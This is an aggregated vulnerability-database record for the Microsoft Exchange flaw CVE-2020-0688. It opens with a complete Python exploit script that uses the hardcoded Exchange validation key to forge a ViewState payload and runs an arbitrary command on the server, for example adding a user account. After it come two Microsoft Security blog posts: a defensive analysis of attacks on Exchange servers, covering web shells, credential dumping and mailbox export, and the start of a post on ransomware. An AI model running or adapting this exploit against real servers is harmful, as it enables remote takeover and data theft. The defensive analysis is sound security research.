See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see <http://www.gnu.org/licenses/>.\r\n \r\n File name CVE-2020-0688-Photubias.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n\r\n This is a native implementation without requirements, written in Python 2.\r\n Works equally well on Windows as Linux (as MacOS, probably ;-)\r\n Reverse Engineered Serialization code from https://github.com/pwntester/ysoserial.net\r\n\r\n Example Output:\r\n CVE-2020-0688-Photubias.py -t https://10.11.12.13 -u sean -c \"net user pwned pwned /add\"\r\n [+] Login worked\r\n [+] Got ASP.NET Session ID: 83af2893-6e1c-4cee-88f8-b706ebc77570\r\n [+] Detected OWA version number 15.2.221.12\r\n [+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!\r\n [+] All looks OK, ready to send exploit (net user pwned pwned /add)? [Y/n]:\r\n [+] Got Payload: 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\r\n Sending now ...\r\n'''\r\nimport urllib2, urllib, base64, binascii, hashlib, hmac, struct, argparse, sys, cookielib, ssl, getpass\r\n\r\n## STATIC STRINGS\r\n# This string acts as a template for the serialization (contains \"###payload###\" to be replaced and TWO size locations)\r\nstrSerTemplate = base64.b64decode('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')\r\n# This is a key installed in the Exchange Server, it is changeable, but often not (part of the vulnerability)\r\nstrSerKey = binascii.unhexlify('CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF')\r\n\r\ndef convertInt(iInput, length): \r\n return struct.pack(\"<I\" , int(iInput)).encode('hex')[:length]\r\n\r\ndef getYsoserialPayload(sCommand, sSessionId):\r\n ## PART1 of the payload to hash\r\n strPart1 = strSerTemplate.replace('###payload###', sCommand)\r\n ## Fix the length fields\r\n #print(binascii.hexlify(strPart1[3]+strPart1[4])) ## 'da06' > '06da' (0x06b8 + 
len(sCommand))\r\n #print(binascii.hexlify(strPart1[224]+strPart1[225])) ## 'fc04' > '04fc' (0x04da + len(sCommand))\r\n strLength1 = convertInt(0x06b8 + len(sCommand),4)\r\n strLength2 = convertInt(0x04da + len(sCommand),4)\r\n strPart1 = strPart1[:3] + binascii.unhexlify(strLength1) + strPart1[5:]\r\n strPart1 = strPart1[:224] + binascii.unhexlify(strLength2) + strPart1[226:]\r\n \r\n ## PART2 of the payload to hash\r\n strPart2 = '274e7bb9'\r\n for v in sSessionId: strPart2 += binascii.hexlify(v)+'00'\r\n strPart2 = binascii.unhexlify(strPart2)\r\n \r\n strMac = hmac.new(strSerKey, strPart1 + strPart2, hashlib.sha1).hexdigest()\r\n strResult = base64.b64encode(strPart1 + binascii.unhexlify(strMac))\r\n return strResult\r\n\r\ndef verifyLogin(sTarget, sUsername, sPassword, oOpener, oCookjar):\r\n if not sTarget[-1:] == '/': sTarget += '/'\r\n ## Verify Login\r\n lPostData = {'destination' : sTarget, 'flags' : '4', 'forcedownlevel' : '0', 'username' : sUsername, 'password' : sPassword, 'passwordText' : '', 'isUtf8' : '1'}\r\n try: sResult = oOpener.open(urllib2.Request(sTarget + 'owa/auth.owa', data=urllib.urlencode(lPostData), headers={'User-Agent':'Python'})).read()\r\n except: print('[!] 
Error, ' + sTarget + ' not reachable')\r\n bLoggedIn = False\r\n for cookie in oCookjar:\r\n if cookie.name == 'cadata': bLoggedIn = True\r\n if not bLoggedIn:\r\n print('[-] Login Wrong, too bad')\r\n exit(1)\r\n print('[+] Login worked')\r\n\r\n ## Verify Session ID\r\n sSessionId = ''\r\n sResult = oOpener.open(urllib2.Request(sTarget+'ecp/default.aspx', headers={'User-Agent':'Python'})).read()\r\n for cookie in oCookjar:\r\n if 'SessionId' in cookie.name: sSessionId = cookie.value\r\n print('[+] Got ASP.NET Session ID: ' + sSessionId)\r\n\r\n ## Verify OWA Version\r\n sVersion = ''\r\n try: sVersion = sResult.split('stylesheet')[0].split('href=\"')[1].split('/')[2]\r\n except: sVersion = 'favicon'\r\n if 'favicon' in sVersion:\r\n print('[*] Problem, this user has never logged in before (wizard detected)')\r\n print(' Please log in manually first at ' + sTarget + 'ecp/default.aspx')\r\n exit(1)\r\n print('[+] Detected OWA version number '+sVersion)\r\n\r\n ## Verify ViewStateValue\r\n sViewState = ''\r\n try: sViewState = sResult.split('__VIEWSTATEGENERATOR')[2].split('value=\"')[1].split('\"')[0]\r\n except: pass\r\n if sViewState == 'B97B4E27':\r\n print('[+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!')\r\n else:\r\n print('[-] Error, viewstate wrong or not correctly parsed: '+sViewState)\r\n ans = raw_input('[?] Still want to try the exploit? [y/N]: ')\r\n if ans == '' or ans.lower() == 'n': exit(1)\r\n return sSessionId, sTarget, sViewState\r\n \r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-t', '--target', help='Target IP or hostname (e.g. https://owa.contoso.com)', default='')\r\n parser.add_argument('-u', '--username', help='Username (e.g. joe or [email\u00a0protected])', default='')\r\n parser.add_argument('-p', '--password', help='Password (leave empty to ask for it)', default='')\r\n parser.add_argument('-c', '--command', help='Command to put behind \"cmd /c \" (e.g. 
net user pwned pwned /add)', default='')\r\n args = parser.parse_args()\r\n if args.target == '' or args.username == '' or args.command == '':\r\n print('[!] Example usage: ')\r\n print(' ' + sys.argv[0] + ' -t https://owa.contoso.com -u joe -c \"net user pwned pwned /add\"')\r\n else:\r\n if args.password == '': sPassword = getpass.getpass('[*] Please enter the password: ')\r\n else: sPassword = args.password\r\n ctx = ssl.create_default_context()\r\n ctx.check_hostname = False\r\n ctx.verify_mode = ssl.CERT_NONE\r\n oCookjar = cookielib.CookieJar()\r\n #oProxy = urllib2.ProxyHandler({'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'})\r\n #oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar),oProxy)\r\n oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar))\r\n sSessionId, sTarget, sViewState = verifyLogin(args.target, args.username, sPassword, oOpener, oCookjar)\r\n ans = raw_input('[+] All looks OK, ready to send exploit (' + args.command + ')? 
[Y/n]: ')\r\n if ans.lower() == 'n': exit(0)\r\n sPayLoad = getYsoserialPayload(args.command, sSessionId)\r\n print('[+] Got Payload: ' + sPayLoad)\r\n sURL = sTarget + 'ecp/default.aspx?__VIEWSTATEGENERATOR=' + sViewState + '&__VIEWSTATE=' + urllib.quote_plus(sPayLoad)\r\n print(' Sending now ...')\r\n try: oOpener.open(urllib2.Request(sURL, headers={'User-Agent':'Python'}))\r\n except urllib2.HTTPError, e:\r\n if e.code == '500': print('[+] This probably worked (Error Code 500 received)')\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\n\n# 0day.today [2020-03-04] #", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34037"}], "mssecure": [{"lastseen": "2020-06-26T22:16:11", "bulletinFamily": "blog", "cvelist": ["CVE-2020-0688"], "description": "Securing Exchange servers is one of the most important things defenders can do to limit organizational exposure to attacks. Any threat or vulnerability impacting Exchange servers should be treated with the highest priority because these servers contain critical business data, as well as highly privileged accounts that attackers attempt to compromise to gain admin rights to the server and, consequently, complete control of the network.\n\nIf compromised, Exchange servers provide a unique environment that could allow attackers to perform various tasks using the same built-in tools or scripts that admins use for maintenance. This is exacerbated by the fact that Exchange servers have traditionally lacked antivirus solutions, network protection, the latest security updates, and proper security configuration, often intentionally, due to the misguided notion that these protections interfere with normal Exchange functions. Attackers know this, and they leverage this knowledge to gain a stable foothold on a target organization.\n\nThere are two primary ways in which Exchange servers are compromised. 
The first and more common scenario is attackers launching social engineering or drive-by download attacks targeting endpoints, where they steal credentials and move laterally to other endpoints in a progressive dump-escalate-move method until they gain access to an Exchange server.\n\nThe second scenario is where attackers exploit a remote code execution vulnerability affecting the underlying Internet Information Service (IIS) component of a target Exchange server. This is an attacker\u2019s dream: directly landing on a server and, if the server has misconfigured access levels, gain system privileges.\n\nThe first scenario is more common, but we\u2019re seeing a rise in attacks of the second variety; specifically, attacks that exploit Exchange vulnerabilities like [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>). The [security update](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) that fixes this vulnerability has been available for several months, but, notably, to this day, attackers find vulnerable servers to target.\n\nIn many cases, after attackers gain access to an Exchange server, what follows is the deployment of web shell into one of the many web accessible paths on the server. As we discussed in a previous blog, [web shells](<https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/>) allow attackers to steal data or perform malicious actions for further compromise.\n\n## Behavior-based detection and blocking of malicious activities on Exchange servers\n\nAdversaries like using web shells, which are relatively small pieces of malicious code written in common programming languages, because these can be easily modified to evade traditional file-based protections. 
A more durable approach to detecting web shell activity involves profiling process activities originating from external-facing Exchange applications.\n\n[Behavior-based blocking and containment](<https://www.microsoft.com/security/blog/2020/03/09/behavioral-blocking-and-containment-transforming-optics-into-protection/>) capabilities in Microsoft Defender ATP, which use engines that specialize in [detecting threats by analyzing behavior](<https://www.microsoft.com/security/blog/2019/10/08/in-hot-pursuit-of-elusive-threats-ai-driven-behavior-based-blocking-stops-attacks-in-their-tracks/>), surface suspicious and malicious activities on Exchange servers. These detection engines are powered by cloud-based machine learning classifiers that are trained by expert-driven profiling of legitimate vs. suspicious activities in Exchange servers.\n\nIn April, multiple Exchange-specific behavior-based detections picked up unusual activity. The telemetry showed attackers operating on on-premises Exchange servers using deployed web shells. Whenever attackers interacted with the web shell, the hijacked application pool ran the command on behalf of the attacker, generating an interesting process chain. Common services, for example Outlook on the web (formerly known as Outlook Web App or OWA) or Exchange admin center (EAC; formerly known as the Exchange Control Panel or ECP), executing _net.exe_, _cmd.exe_, and other known living-off-the-land binaries ([LOLBins](<https://github.com/LOLBAS-Project/LOLBAS/blob/master/README.md>)) like _mshta.exe_ is very suspicious and should be further investigated.\n\n\n\n_Figure 1. Behavior-based detections of attacker activity on Exchange servers_\n\nIn this blog, we\u2019ll share our investigation of the Exchange attacks in early April, covering multiple campaigns occurring at the same time. The data and techniques from this analysis make up an anatomy of Exchange server attacks. 
Notably, the attacks used multiple fileless techniques, adding another layer of complexity to detecting and resolving these threats, and demonstrating how behavior-based detections are key to protecting organizations.\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2020/06/Exchange-servers-attack-chain-2.png>)\n\n_Figure 2. Anatomy of an Exchange server attack_\n\n## Initial access: Web shell deployment\n\nAttackers started interacting with target Exchange servers through web shells they had deployed. Any path accessible over the internet is a potential target for web shell deployment, but in these attacks, the most common client access paths were:\n\n * _%ProgramFiles%\\Microsoft\\Exchange Server\\<version>\\ClientAccess_\n * _%ProgramFiles%\\Microsoft\\Exchange Server\\<version>\\FrontEnd_\n\nThe ClientAccess and FrontEnd directories provide various client access services such as Outlook on the web, EAC, and AutoDiscover, to name a few. These IIS virtual directories are automatically configured during server installation and provide authentication and proxy services for internal and external client connections.\n\nThese directories should be monitored for any new file creation. While file creation events alone cannot be treated as suspicious, correlating such events with the responsible process results in more reliable signals. Common services like OWA or ECP dropping _.aspx_ or _.ashx_ files in any of the said directories is highly suspicious.\n\nIn our investigation, most of these attacks used the [China Chopper](<https://attack.mitre.org/software/S0020/>) web shell. The attackers tried to blend the web shell script file with other _.aspx_ files present on the system by using common file names. In many cases, hijacked servers used the \u2018echo\u2019 command to write the web shell. In other cases, _certutil.exe_ or _powershell.exe_ were used. 
Here are some examples of the China Chopper codes that were dropped in these attacks:\n\n\n\nWe also observed the attackers switching web shells or introducing two or more for various purposes. In one case, the attackers created an _.ashx_ version of a popular, publicly available _.aspx_ web shell, which exposes minimum functionality:\n\n\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2020/06/A-suspicious-web-script-was-created.png>)\n\n_Figure 3. Microsoft Defender ATP alert for web shell_\n\n## Reconnaissance\n\nAfter web shell deployment, attackers typically ran an initial set of exploratory commands like _whoami_, _ping_, and _net user_. In most cases, the hijacked application pool services were running with system privileges, giving attackers the highest privilege.\n\nAttackers enumerated all local groups and members on the domain to identify targets. Interestingly, in some campaigns, attackers used open-source user group enumerating tools like _lg.exe_ instead of the built-in _net.exe_. Attackers also used the [EternalBlue](<https://www.microsoft.com/security/blog/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) exploit and _nbtstat_ scanner to identify vulnerable machines on the network.\n\n\n\nNext, the attackers ran built-in Exchange Management Shell cmdlets to gain more information about the exchange environment. Attackers used these cmdlets to perform the following:\n\n * List all Exchange admin center virtual directories in client access services on all Mailbox servers in the network\n * Get a summary list of all the Exchange servers in the network\n * Get information on mailboxes, such as size and number of items, along with role assignments and permissions.\n\n\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2020/06/Anomalous-account-lookups.png>)\n\n_Figure 4. 
Microsoft Defender ATP alert showing process tree for anomalous account lookups_\n\n## Persistence\n\nOn misconfigured servers where they had gained the highest privileges, attackers were able to add a new user account on the server. This gave the attackers the ability to access the server without the need to deploy any remote access tools.\n\nThe attackers then added the newly created account to high-privilege groups like Administrators, Remote Desktop Users, and Enterprise Admins, practically making the attackers a domain admin with unrestricted access to any user or group in the organization.\n\n\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2020/06/New-local-admin-added-using-Net-commands.png>)\n\n_Figure 5. Microsoft Defender ATP alert showing process tree for addition of local admin using Net commands_\n\n## Credential access\n\nExchange servers contain the most sensitive users and groups in an organization. Gaining credentials to these accounts could virtually give attackers domain admin privileges.\n\nIn our investigation, the attackers first dumped user hashes by saving the Security Account Manager (SAM) database from the registry.\n\n\n\nNext, the attackers used the ProcDump tool to dump the Local Security Authority Subsystem Service (LSASS) memory. The dumps were later archived and uploaded to a remote location.\n\n\n\nIn some campaigns, attackers dropped Mimikatz and tried to dump hashes from the server.\n\n\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2020/06/Malicious-credential-theft-tool-execution-detected.png>)\n\n_Figure 6. Microsoft Defender ATP alert on detection of Mimikatz_\n\nIn environments where Mimikatz was blocked, attackers dropped a modified version with hardcoded implementation to avoid detection. Attackers also added a wrapper written in the Go programming language to make the binary more than 5 MB. 
The binary used the open-source MemoryModule library to load the binary using [reflective DLL injection](<https://www.microsoft.com/security/blog/2017/11/13/detecting-reflective-dll-loading-with-windows-defender-atp/>). Thus, the payload never touched the disk and was present only in memory, achieving a fileless persistence.\n\nThe attackers also enabled \u2018_wdigest_\u2019 registry settings, which forced the system to use WDigest protocol for authentication, resulting in _lsass.exe_ retaining a copy of the user\u2019s plaintext password in memory. This change allowed the attacker to steal the actual password, not just the hash.\n\n\n\n\n\nAnother example of stealthy execution that attackers implemented was creating a wrapper binary for ProcDump and Mimikatz. When run, the tool dropped and executed the ProcDump binary to dump the LSASS memory. The memory dump was loaded inside the same binary and parsed to extract passwords, another example of [reflective DLL injection](<https://www.microsoft.com/security/blog/2017/11/13/detecting-reflective-dll-loading-with-windows-defender-atp/>) where the Mimikatz binary was present only in memory.\n\n\n\nWith attacker-controlled accounts now part of Domain Admins group, the attackers performed a technique called [DCSYNC](<https://attack.mitre.org/techniques/T1003/>) attack, which abuses the Active Directory replication capability to request account information, such as the NTLM hashes of all the users\u2019 passwords in the organization. 
This technique is extremely stealthy because it can be performed without running a single command on the actual domain controller.\n\n\n\n## Lateral movement\n\nIn these attacks, the attackers used several known methods to move laterally:\n\n * The attackers heavily abused WMI for executing tools on remote systems.\n\n\n\n * The attackers also used other techniques such as creating a service or scheduled task on remote systems.\n\n\n\n\n\n * In some cases, the attackers simply ran commands on remote systems using PsExec.\n\n\n\n## Exchange Management Shell abuse\n\nThe Exchange Management Shell is the PowerShell interface for administrators to manage the Exchange server. As such, it exposes many critical Exchange PowerShell cmdlets to allow admins to perform various maintenance tasks, such as assigning roles and permissions, and migration, including importing and exporting mailboxes. These cmdlets are available only on Exchange servers in the Exchange Management Shell or through remote PowerShell connections to the Exchange server.\n\nTo understand suspicious invocation of the Exchange Management Shell, we need to go one step back in the process chain and analyze the responsible process. As mentioned, common application pools _MSExchangeOWAAppPool_ or _MSExchangeECPAppPool_ accessing the shell should be considered suspicious.\n\nIn our investigation, attackers leveraged these admin cmdlets to perform critical tasks such as exporting mailboxes or running arbitrary scripts. Attackers used different ways to load and run PowerShell cmdlets through the Exchange Management Shell.\n\n\n\nIn certain cases, attackers created a PowerShell wrapper around the commands to effectively hide behind legitimate PowerShell activity.\n\n\n\nThese cmdlets allowed the attackers to perform the following:\n\n * Search received email\n\nIn our investigations, attackers were primarily interested in received emails. 
They searched for message delivery information filtered by the event \u2018Received\u2019. The search time frame showed the attackers were initially interested in the entire log history. Later, a similar command was run with a trimmed timeline of one year.\n\n\n\n * Export mailbox\n\nAttackers exported mailboxes through these four steps:\n\n 1. Granted the _ApplicationImpersonation_ role to the attacker-controlled account. This effectively allowed the supplied account to access all mailboxes in the organization.\n 2. Granted the \u2018Mailbox Import Export\u2019 role to the attacker-controlled account. This role is required to be added before attempting mailbox export.\n 3. Exported the mailbox with filter \u201c_Received -gt \u201801/01/2020 0:00:00\u2019_\u201d.\n 4. Removed the mailbox export request to avoid raising suspicion.\n\n\n\n\n\n## Tampering with security tools\n\nAs part of lateral movement, the attackers attempted to disable Microsoft Defender Antivirus. Attackers also disabled archive scanning to bypass detection of tools and data compressed in .zip files, and created an exclusion for the _.dat_ extension. The attackers tried to disable automatic updates to avoid any detection by new intelligence updates. For Microsoft Defender ATP customers, [tamper protection](<https://docs.microsoft.com/windows/security/threat-protection/windows-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) prevents such malicious and unauthorized changes to security settings.\n\n\n\n## Remote access\n\nThe next step for attackers was to create a network architecture using port forwarding tools like _plink.exe_, a command line connection tool like _ssh_. Using these tools allowed attackers to bypass network restrictions and remotely access machines through Remote Desktop Protocol (RDP). 
This is a very stealthy technique: attackers reused dumped credentials to access the machines through encrypted tunneling software, eliminating the need to deploy backdoors, which may have a high chance of getting detected.\n\n\n\n## Exfiltration\n\nFinally, dumped data was compressed using the utility tool _rar.exe_. The compressed data consisted mostly of the extracted _.pst_ files, along with memory dumps.\n\n\n\n# Improving defenses against Exchange server compromise\n\nAs these attacks show, Exchange servers are high-value targets. These attacks also tend to be advanced threats with highly evasive, fileless techniques. For example, at every stage in the attack chain above, the attackers abused existing tools (LOLBins) and scripts to accomplish various tasks. Even in cases where non-system binaries were introduced, they were either legitimate and signed, like _plink.exe_, or just a proxy for the malicious binary, for example, the modified Mimikatz where the actual malicious payload never touched the disk.\n\nKeeping these servers safe from these advanced attacks is of utmost importance. Here are steps that organizations can take to ensure they don\u2019t fall victim to Exchange server compromise.\n\n 1. Apply the latest security updates\n\nIdentify and remediate vulnerabilities or misconfigurations in Exchange servers. Deploy the latest security updates, especially for server components like Exchange, as soon as they become available. Specifically, check that the patch for CVE-2020-0688 is in place. Use [threat and vulnerability management](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) to audit these servers regularly for vulnerabilities, misconfigurations, and suspicious activity.\n\n 2. 
Keep antivirus and other protections enabled\n\nIt\u2019s critical to protect Exchange servers with [antivirus software](<https://docs.microsoft.com/exchange/antispam-and-antimalware/windows-antivirus-software?view=exchserver-2019>) and other security solutions like firewall protection and MFA. [Turn on cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/windows-defender-antivirus/enable-cloud-protection-windows-defender-antivirus>) and automatic sample submission to use artificial intelligence and machine learning to quickly identify and stop new and unknown threats. Use [attack surface reduction rules](<https://docs.microsoft.com/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard>) to automatically block behaviors like credential theft and suspicious use of PsExec and WMI. Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n\nIf you are worried that these security controls will affect performance or disrupt operations, engage with IT pros to help determine the true impact of these settings. Security teams and IT pros should collaborate on applying mitigations and appropriate [settings](<https://docs.microsoft.com/exchange/antispam-and-antimalware/windows-antivirus-software>).\n\n 3. Review sensitive roles and groups\n\nReview highly privileged groups like Administrators, Remote Desktop Users, and Enterprise Admins. Attackers add accounts to these groups to gain foothold on a server. Regularly review these groups for suspicious additions or removal. To identify Exchange-specific anomalies, review the list of users in sensitive roles such as _mailbox import export_ and _Organization Management_ using the _Get-ManagementRoleAssignment_ cmdlet in Exchange PowerShell.\n\n 4. 
Restrict access\n\nPractice the principle of least-privilege and maintain credential hygiene. Avoid the use of domain-wide, admin-level service accounts. Enforce [strong randomized, just-in-time local administrator passwords](<https://docs.microsoft.com/windows-server/identity/securing-privileged-access/securing-privileged-access#2-just-in-time-local-admin-passwords>) and enable MFA. Use tools like [LAPS](<https://technet.microsoft.com/en-us/mt227395.aspx>).\n\nPlace access control list (ACL) restrictions on ECP and other virtual directories in IIS. Don\u2019t expose the ECP directory to the web if it isn\u2019t necessary and to anyone in the company who doesn\u2019t need to access it. Apply similar restrictions to other application pools.\n\n 5. Prioritize alerts\n\nThe distinctive patterns of Exchange server compromise aid in detecting malicious behaviors and inform security operations teams to quickly respond to the initial stages of compromise. Pay attention to and immediately investigate alerts indicating suspicious activities on Exchange servers. Catching attacks in the exploratory phase, the period in which attackers spend several days exploring the environment after gaining access, is key. Common application pools like _\u2018MSExchangeOWAAppPool\u2019_ or _\u2018MSExchangeECPAppPool\u2019_ are commonly hijacked by attackers through web shell deployment. Prioritize alerts related to processes such as _net.exe_, _cmd.exe_, and _mshta.exe_ originating from these pools or _w3wp.exe_ in general.\n\nBehavior-based blocking and containment capabilities in [Microsoft Defender Advanced Threat Protection](<https://www.microsoft.com/WindowsForBusiness/windows-atp>) stop many of the malicious activities we described in this blog. Behavior-based blocking and containment stops advanced attacks in their tracks by detecting and halting malicious processes and behaviors.\n\n \n\n \n\n_Figure 7. 
Microsoft Defender ATP alerts on blocked behaviors_\n\nIn addition, Microsoft Defender ATP\u2019s endpoint detection and response (EDR) sensors provide visibility into malicious behaviors associated with Exchange server compromise. Behavior-based Exchange-specific alerts include \u201cSuspicious w3wp.exe activity in Exchange\u201d, which indicates that attackers are running arbitrary commands via the IIS processes in an Exchange server.\n\n_Figure 8. Microsoft Defender ATP alert and process tree for suspicious w3wp.exe activity in Exchange_\n\nThese alerts should be immediately prioritized and fully investigated, and any credentials present on the Exchange server, including those used for service accounts and scheduled tasks, should be considered compromised. Beyond resolving these alerts in the shortest possible time, organizations should focus on investigating the end-to-end attack chain and trace the vulnerability, misconfiguration, or other weakness in the infrastructure that allowed the attack to occur.\n\nMicrosoft Defender ATP is a component of the broader [Microsoft Threat Protection](<https://www.microsoft.com/security/technology/threat-protection>) (MTP), which provides comprehensive visibility into advanced attacks by combining the capabilities of Office 365 ATP, Azure ATP, Microsoft Cloud App Security, and Microsoft Defender ATP. Through the [incidents](<https://docs.microsoft.com/microsoft-365/security/mtp/incidents-overview?view=o365-worldwide>) view, MTP provides a consolidated picture of related attack evidence that shows the complete attack story, empowering SecOps teams to thoroughly investigate attacks.\n\nIn addition, MTP\u2019s visibility into malicious artifacts and behavior empowers security operations teams to proactively hunt for threats on Exchange servers. 
For example, MTP can be connected to Azure Sentinel to enable [web shell threat hunting](<https://techcommunity.microsoft.com/t5/azure-sentinel/web-shell-threat-hunting-with-azure-sentinel-and-microsoft/ba-p/1448065>).\n\nThrough built-in intelligence and automation, Microsoft Threat Protection coordinates protection, detection, and response across endpoints, identity, data, and apps. [Learn more](<https://www.microsoft.com/en-us/security/technology/threat-protection>).\n\n \n\n**_Hardik Suri_**\n\n_Microsoft Defender ATP Research Team_\n\n \n\n### MITRE ATT&CK techniques\n\nInitial access\n\n * [Exploit Public-Facing Application](<https://attack.mitre.org/techniques/T1190/>)\n\nExecution\n\n * [Command-line interface](<https://attack.mitre.org/techniques/T1059/>)\n * [Windows Management Instrumentation](<https://attack.mitre.org/techniques/T1047/>)\n * [PowerShell](<https://attack.mitre.org/techniques/T1086/>)\n\nPersistence\n\n * [Web Shell](<https://attack.mitre.org/techniques/T1100/>)\n * [Create Account](<https://attack.mitre.org/techniques/T1136/>)\n * [New Service](<https://attack.mitre.org/techniques/T1050/>)\n * [Scheduled Task](<https://attack.mitre.org/techniques/T1053/>)\n\nPrivilege escalation\n\n * [Valid Accounts](<https://attack.mitre.org/techniques/T1078/>)\n * [Web Shell](<https://attack.mitre.org/techniques/T1100/>)\n\nDefense evasion\n\n * [Indicator Removal from Tools](<https://attack.mitre.org/techniques/T1066/>)\n * [Obfuscated Files or Information](<https://attack.mitre.org/techniques/T1027/>)\n * [Masquerading](<https://attack.mitre.org/techniques/T1036/>)\n\nCredential access\n\n * [Credential Dumping](<https://attack.mitre.org/techniques/T1003/>)\n\nDiscovery\n\n * [System Network Configuration Discovery](<https://attack.mitre.org/techniques/T1016/>)\n * [Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>)\n * [Account Discovery](<https://attack.mitre.org/techniques/T1087/>)\n * [Permission Groups 
Discovery](<https://attack.mitre.org/techniques/T1069/>)\n\nLateral movement\n\n * [Windows Admin Shares](<https://attack.mitre.org/techniques/T1077/>)\n * [Pass the Hash](<https://attack.mitre.org/techniques/T1075/>)\n * [Remote File Copy](<https://attack.mitre.org/techniques/T1105/>)\n * [Windows Management Instrumentation](<https://attack.mitre.org/techniques/T1047/>)\n * [New Service](<https://attack.mitre.org/techniques/T1050/>)\n * [Scheduled Task](<https://attack.mitre.org/techniques/T1053/>)\n\nCollection\n\n * [Data From Local System](<https://attack.mitre.org/techniques/T1005/>)\n * [Data Staged](<https://attack.mitre.org/techniques/T1074/>)\n * [Email Collection](<https://attack.mitre.org/techniques/T1114/>)\n\nCommand and control\n\n * [Remote File Copy](<https://attack.mitre.org/techniques/T1105/>)\n * [Connection Proxy](<https://attack.mitre.org/techniques/T1090/>)\n\nExfiltration\n\n * [Data Compressed](<https://attack.mitre.org/techniques/T1002/>)\n * [Exfiltration Over Command and Control Channel](<https://attack.mitre.org/techniques/T1041/>)\n\n \n\nThe post [Defending Exchange servers under attack](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>) appeared first on [Microsoft Security.", "modified": "2020-06-24T16:00:40", "published": "2020-06-24T16:00:40", "id": "MSSECURE:748E6D0B920B699D6D088D0AD4422C46", "href": "https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/", "type": "mssecure", "title": "Defending Exchange servers under attack", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-30T23:04:13", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, 
continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. 
Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. 
